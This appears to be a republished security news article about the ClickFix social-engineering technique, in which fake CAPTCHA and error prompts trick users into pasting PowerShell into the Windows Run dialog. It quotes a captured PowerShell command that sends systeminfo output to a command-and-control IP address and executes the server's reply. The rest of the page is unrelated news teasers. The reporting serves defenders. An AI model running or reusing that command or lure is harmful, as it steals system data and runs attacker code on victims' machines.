κατασκευή ιστοσελίδων ρόδος

TECH - WEB DEVELOPMENT NEWS

Get the latest tech - web development news and analysis on industry around the world.

  • HOME
You are here: Home / INDUSTRY NEWS / Hackers Using New ClickFix Technique To Exploits Human Error Via Fake Prompts
άμυνα
.

Hackers Using New ClickFix Technique To Exploits Human Error Via Fake Prompts

07/06/2025

Cybersecurity researchers have identified a sophisticated new social engineering campaign that exploits fundamental human trust in everyday computer interactions.

The ClickFix technique, which has been actively deployed since March 2024, represents a dangerous evolution in cybercriminal tactics that bypasses traditional security measures by targeting the most vulnerable component of any network: the end user.

This deceptive method masquerades as routine error messages, CAPTCHA verification prompts, or system maintenance notifications to trick victims into executing malicious code on their own systems.

The technique has rapidly gained traction across the cybercriminal ecosystem, attracting attention from individual hackers to sophisticated Advanced Persistent Threat groups including APT28 and MuddyWater, organizations linked to Russian and Iranian state interests respectively.

ClickFix campaigns have successfully compromised organizations across diverse sectors including healthcare, hospitality, automotive, and government agencies, demonstrating the universal applicability of this human-centric attack vector.

Darktrace analysts identified multiple ClickFix attacks across customer environments in both Europe, the Middle East, Africa, and the United States, revealing the global scope of this emerging threat.

Their investigation uncovered a systematic approach where threat actors utilize spear phishing emails, drive-by compromises, and exploitation of trusted platforms like GitHub to deliver malicious payloads.

The attacks typically begin with hidden links embedded in emails or malvertisements on compromised legitimate websites that redirect unsuspecting users to malicious URLs designed to appear as legitimate system prompts.

The psychological manipulation inherent in ClickFix attacks exploits users’ natural inclination to resolve apparent technical issues.

Victims encounter convincing fake CAPTCHA prompts or “Fix It” dialogue boxes that appear to address non-existent problems such as webpage display errors or device registration requirements.

Once engaged, users are guided through what appears to be a standard three-step verification process that ultimately facilitates the execution of malicious PowerShell commands on their systems.

The financial and operational impact of these attacks extends far beyond initial system compromise.

Following successful initial access, threat actors establish command and control communication channels within targeted environments, enabling lateral movement through networks with the primary objective of obtaining and exfiltrating sensitive organizational data.

Malicious payloads associated with various malware families, including XWorm, Lumma, and AsyncRAT, are frequently deployed during these campaigns.

Technical Analysis of the Infection Mechanism

The technical sophistication of ClickFix attacks lies not in complex malware development but in the seamless integration of social engineering with legitimate system functions.

The attack chain begins when victims encounter carefully crafted prompts that instruct them to press Windows Key + R to open the Run dialog box, followed by pressing CTRL+V to paste a pre-loaded malicious PowerShell command, and finally pressing Enter to execute the payload.

Darktrace’s investigation of a specific April 9, 2025 attack revealed the technical intricacies of this process.

The compromise initiated external communication with command and control infrastructure, triggering detection of a new PowerShell user agent indicating attempted remote code execution.

Detection of a numeric file, one minute after the new PowerShell User Agent alert (Source – DarkTrace)

The malicious PowerShell command contained sophisticated obfuscation techniques and timestamp-based file naming conventions.

Analysis of network traffic captured during the attack revealed the PowerShell script’s functionality through packet capture examination.

The command converts the current time to Unix epoch format, creating dynamically named files that appear as innocuous numeric strings.

PCAP highlighting HTTP POST connection with the numeric file (Source – DarkTrace)

For example, the attack generated a file named “1744205184” corresponding to the exact timestamp of execution, followed by a secondary file “1744205200” containing system reconnaissance data.

$s=[int64](((datetime)::UtcNow-[datetime]’1970-1-1′).TotalSeconds)-band 0xfffffffffffff0;
$b=”193.36.38.237″;
$c=’IRM’; $d=’POST’; $e=’Invoke-Expression’;
$f=$(systeminfo|out-string);
&($c) “$b`:8080/$s” -Method $d -Body $f -ContentType ‘application/octet-stream’|&($e)

This PowerShell snippet demonstrates the attack’s methodology, establishing variables for the target IP address, HTTP methods, and system information collection before transmitting comprehensive device details to the command and control server at 193.36.38.237.

The exfiltrated data included complete system specifications, network configurations, security features, and hardware details, providing attackers with extensive intelligence for planning subsequent attack phases.

Speed up and enrich threat investigations with Threat Intelligence Lookup! -> 50 trial search requests
Source: cybersecuritynews.com

Filed Under: INDUSTRY NEWS Tagged With: Source-10

3 reasons I switched to and prefer OpenCloud instead of Nextcloud

For years, Nextcloud was my default self-hosted cloud solution. It promised freedom and control, but over time, I ran into several issues: sluggish performance, bloated experience, and an endless stream of minor bugs. I felt stuck in a trade-off between control and usability – until I finally made the leap to OpenCloud. Source: xda-developers.com … [Read More...]

The best advent calendars for 2025: Our top picks from Lego, Pokémon, Funko Pop and more

Who needs ornaments when you can deck the halls with Star Wars builds? This advent calendar delivers 24 surprises, ranging from tiny ships to minifigures in festive outfits. That means you might spot Darth Vader in a scarf or R2-D2 with some seasonal flair. It’s an easy way to make the holidays feel like a Star Wars marathon on Disney+, with new pieces to add to your desk or display shelf every … [Read More...]

Gemini CLI to Your Kali Linux Terminal To Automate Penetration Testing Tasks

With the release of Kali Linux 2025.3, a major update introduces an innovative tool that combines artificial intelligence and cybersecurity: the Gemini Command-Line Interface (CLI). This new open-source package integrates Google’s powerful Gemini AI directly into the terminal, offering penetration testers and security professionals an intelligent assistant designed to streamline and automate … [Read More...]

OxygenOS 16 Launch Date Confirmed; New OnePlus AI Features Expected to Debut With OnePlus 15

OxygenOS 16 will be launched by OnePlus on October 16 in India, the Chinese smartphone maker announced. The new user interface will be built on top of Android 16. It will bring several new redesigned elements to OnePlus handsets, along with a suite of artificial intelligence (AI)-powered features. The upcoming OnePlus 15, the company's next flagship handset, might run OxygenOS 16 out of the box, … [Read More...]

Bitcoin Price Drops to $124,000 After Hitting New All-Time High

The global crypto market opened Monday on a bullish note, as Bitcoin consolidated gains after hitting a new all-time high over the weekend. The world's most widely used digital asset briefly surged past the $125,500 (roughly Rs. 1.1 crore) mark, before dropping to around $124,000 (roughly Rs. 1.1 crore). Ethereum also held strong above $4,500 (roughly Rs. 3.99 lakh), reflecting the momentum that … [Read More...]

Beer Giant Asahi Says Data Stolen in Ransomware Attack

Japanese brewing giant Asahi Group Holdings has confirmed that a ransomware attack has caused the week-long outage at its domestic subsidiaries. The company disclosed the incident last week, blaming order and shipment operational disruptions, and call center downtime on a cyberattack that resulted in system failures. The company, which suspended production at some of its factories in Japan, … [Read More...]

PoC Exploit Released for Sudo Vulnerability that Enables Attackers to Gain Root Access

A publicly available proof-of-concept (PoC) exploit has been released for CVE-2025-32463, a local privilege escalation (LPE) flaw in the Sudo utility that can grant root access under specific configurations.  Security researcher Rich Mirch is credited with identifying the weakness, while a functional PoC and usage guide have been published in an open GitHub repository, accelerating the … [Read More...]

Oracle E-Business Suite Zero-Day Exploited in Cl0p Attacks

The recent data theft and extortion campaign targeting Oracle E-Business Suite customers has been confirmed to be the work of the notorious Cl0p ransomware group, and Oracle has admitted that the hackers have exploited a zero-day vulnerability. The attacks targeting Oracle E-Business Suite (EBS) customers came to light last week, when Google Threat Intelligence Group (GTIG) and Mandiant warned … [Read More...]

Realme GT 8 Pro Spotted in Hands-On Image; Said to Feature 200-Megapixel Telephoto Camera

Realme GT 8 Pro is set to launch in China in October alongside the standard Realme GT 8. The company has teased some key details of the upcoming smartphones. The company previously revealed that the Realme GT 8 Pro variant will feature a swappable rear camera module. A recently leaked live image showcases one of the three designs of the purported interchangeable camera island. A senior company … [Read More...]

Redis Server Vulnerability use-after-free Vulnerability Enables Remote Code Execution

A critical use-after-free vulnerability, identified as CVE-2025-49844, has been discovered in Redis servers, enabling authenticated attackers to achieve remote code execution. This high-severity flaw affects all versions of Redis that utilize the Lua scripting engine, presenting a significant threat to a wide range of deployments that rely on the popular in-memory data store. The core of … [Read More...]

Tags

Source-1 Source-2 Source-3 Source-4 Source-5 Source-6 Source-7 Source-8 Source-9 Source-10 Source-12 Source-13 Source-15 Source-16

Tech Web Development News

This is a PERSONAL and PRIVATE WEBPAGE. Please leave this page. Contact me via email : admin@news-6.com about anything you would like to ask or problem.

Tech News

Disclaimer!
In every post is written below the original source of the post. Copyrights belong on their owners.

Web Development News

HOTELS – CRUISES – CARS – TRAVEL

Recent Posts

  • 3 reasons I switched to and prefer OpenCloud instead of Nextcloud
  • The best advent calendars for 2025: Our top picks from Lego, Pokémon, Funko Pop and more
  • Gemini CLI to Your Kali Linux Terminal To Automate Penetration Testing Tasks
  • OxygenOS 16 Launch Date Confirmed; New OnePlus AI Features Expected to Debut With OnePlus 15
  • Bitcoin Price Drops to $124,000 After Hitting New All-Time High

Technology - Seo

Categories

  • INDUSTRY NEWS

World Industry News

Privacy & Cookies: This site uses cookies.
To find out more, as well as how to remove or block these, see here: Our Cookie Policy
TECH - WEB DEVELOPMENT NEWS @ COPYRIGHTS 2023